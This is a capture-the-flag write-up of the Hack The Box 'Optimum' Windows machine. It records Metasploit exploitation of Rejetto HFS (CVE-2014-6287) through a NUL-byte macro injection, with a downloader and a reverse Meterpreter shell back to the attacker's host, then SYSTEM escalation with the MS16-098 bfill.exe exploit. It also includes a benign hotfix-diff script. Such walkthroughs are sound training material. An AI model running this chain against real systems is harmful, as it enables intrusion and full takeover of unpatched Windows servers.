Optimum

OS: Windows, Difficulty: Easy, IP: 10.10.10.8

Initial Enumeration

# Nmap 7.70 scan initiated Mon Jul 15 21:15:18 2019 as: nmap --min-parallelism 500 -p- -T5 -oN T-all 10.10.10.8
Nmap scan report for 10.10.10.8
Host is up (0.45s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

# Nmap done at Mon Jul 15 21:17:01 2019 -- 1 IP address (1 host up) scanned in 102.76 seconds

Only port 80 was open; every other port was filtered. The web server on it is Rejetto's HTTP File Server (HFS).

Searching exploit-db for HFS:

-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service                                             | exploits/osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)                                                       | exploits/osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure                                                   | exploits/osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation                                            | exploits/osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution                                                    | exploits/windows/remote/37985.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service                                                   | exploits/linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)                                        | exploits/windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities                                             | exploits/windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                | exploits/multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                           | exploits/windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                           | exploits/windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                      | exploits/windows/webapps/34852.txt
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

There is a Metasploit RCE module for HFS 2.3.x, exploit/windows/http/rejetto_hfs_exec (CVE-2014-6287). HFS expands {.macro.} expressions in the search parameter, and the filter that is supposed to strip them stops at a NUL byte, so a request to /?search=%00{.exec|...} runs a command on the server. The module uses this to save a small VBS downloader to disk and run it with cscript, which fetches the stager from SRVHOST:SRVPORT; that VBS file is what the cleanup warning at the end refers to.

msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8
RHOSTS => 10.10.10.8
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Using URL: http://0.0.0.0:8080/NBj722WLq5tm
[*] Local IP: http://192.168.219.136:8080/NBj722WLq5tm
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /NBj722WLq5tm
[*] Sending stage (179779 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.8:49162) at 2019-07-15 21:25:49 +0530
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\KYbWZVdbNMHQ.vbs' on the target
meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

User Own

C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c39***

Root Own

Used Windows Exploit Suggester (windows-exploit-suggester.py, which announces itself as winsploit) to get exploit suggestions. It takes the output of systeminfo copied from the box and compares the installed hotfixes against Microsoft's security bulletin spreadsheet:

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ISO-8859-1)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*] done
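The suggester's core logic is simple enough to reproduce, and doing so makes its false positives obvious. The following is an added example and not the Windows-Exploit-Suggester code: it parses the Hotfix(s) block of a systeminfo dump for KB numbers and reports which bulletins have no matching KB installed. The systeminfo text is constructed for the demo; the bulletin-to-KB mapping uses the KB numbers printed in the suggester output above, but only a handful of them.

```python
"""Minimal hotfix-vs-bulletin diff, the idea behind Windows Exploit Suggester.

Added example; not the tool's code. SAMPLE_SYSTEMINFO is constructed for the
demo and BULLETINS is a subset of the bulletins/KBs shown in the output above.
"""
import re

SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB3124901
                           [04]: KB3134228
"""

# bulletin -> (KB that fixes it, what it is); taken from the suggester output
BULLETINS = {
    "MS16-135": ("KB3199135", "Kernel-Mode Drivers EoP"),
    "MS16-098": ("KB3178466", "Kernel-Mode Drivers EoP"),
    "MS16-032": ("KB3143141", "Secondary Logon EoP"),
    "MS16-014": ("KB3134228", "Windows RCE"),
    "MS16-007": ("KB3124901", "Windows RCE"),
}

# "[01]: KB2919355" lines; the KB token is the same in every UI language,
# unlike the field labels, so this part of the parse is locale-independent.
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def installed_hotfixes(systeminfo_text):
    """Set of KB identifiers listed under Hotfix(s)."""
    return set(HOTFIX_RE.findall(systeminfo_text))


def is_x64(systeminfo_text):
    """True when 'System Type' says x64; decides which exploit builds apply."""
    m = re.search(r"^System Type:\s*(.+)$", systeminfo_text, re.M)
    return bool(m) and "x64" in m.group(1)


def missing_bulletins(systeminfo_text, bulletins=BULLETINS):
    """Bulletins whose fixing KB is not installed, newest first.

    Absence of the KB is only a hint: a later cumulative update can
    supersede it without the KB number ever appearing in systeminfo.
    """
    have = installed_hotfixes(systeminfo_text)
    return sorted((b for b, (kb, _) in bulletins.items() if kb not in have),
                  reverse=True)


if __name__ == "__main__":
    print("x64:", is_x64(SAMPLE_SYSTEMINFO))
    for b in missing_bulletins(SAMPLE_SYSTEMINFO):
        print(b, BULLETINS[b][0], BULLETINS[b][1])
```

Two caveats a practitioner should carry over to the real tool. First, "missing KB" is not "vulnerable": the 246 "remaining vulns" above include many that a later rollup already fixed, which is why the list has to be triaged by hand. Second, on a box whose UI language is not English (this one reports el_GR) the systeminfo field labels are localised, so anything keyed on label text such as "System Type:" needs the localised label, while the KB regex keeps working.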

Exploit MS16-098 (KB3178466, a win32k.sys elevation of privilege, CVE-2016-3309) worked for me, using the precompiled bfill.exe from the following repository. Upload it with Meterpreter and run it from a shell; it spawns a SYSTEM cmd.exe:

meterpreter > upload bfill.exe
[*] uploading  : bfill.exe -> bfill.exe
[*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): bfill.exe -> bfill.exe
[*] uploaded   : bfill.exe -> bfill.exe
meterpreter > shell
Process 1088 created.
Channel 12 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Users\kostas\Desktop

22/07/2019  04:20     <DIR>          .
22/07/2019  04:20     <DIR>          ..
22/07/2019  03:47     <DIR>          %TEMP%
22/07/2019  04:21            560.128 bfill.exe
18/03/2017  03:11            760.320 hfs.exe
22/07/2019  04:02             10.952 path.txt
22/07/2019  04:02              3.456 Servicenames.txt
22/07/2019  04:02              1.662 services.txt
22/07/2019  04:07              3.334 systeminfo.txt
18/03/2017  03:13                 32 user.txt.txt
               7 File(s)      1.339.884 bytes
               3 Dir(s)  31.888.527.360 bytes free

C:\Users\kostas\Desktop>bfill.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
51ed1***

Learning Outcome

Try a different Windows exploit suggester rather than sticking to the Metasploit one. I tried the default one in MSF (post/multi/recon/local_exploit_suggester) and it did not suggest anything good. Part of the reason is that local_exploit_suggester only evaluates local exploits whose architecture matches the session; sysinfo above shows an x86 Meterpreter on an x64 host, so the x64 kernel exploits were never considered.

EDIT: Learn to migrate to a 64-bit process (ps to pick one, then migrate <pid>) when the box is 64-bit; I missed one exploit because I did not migrate to 64-bit.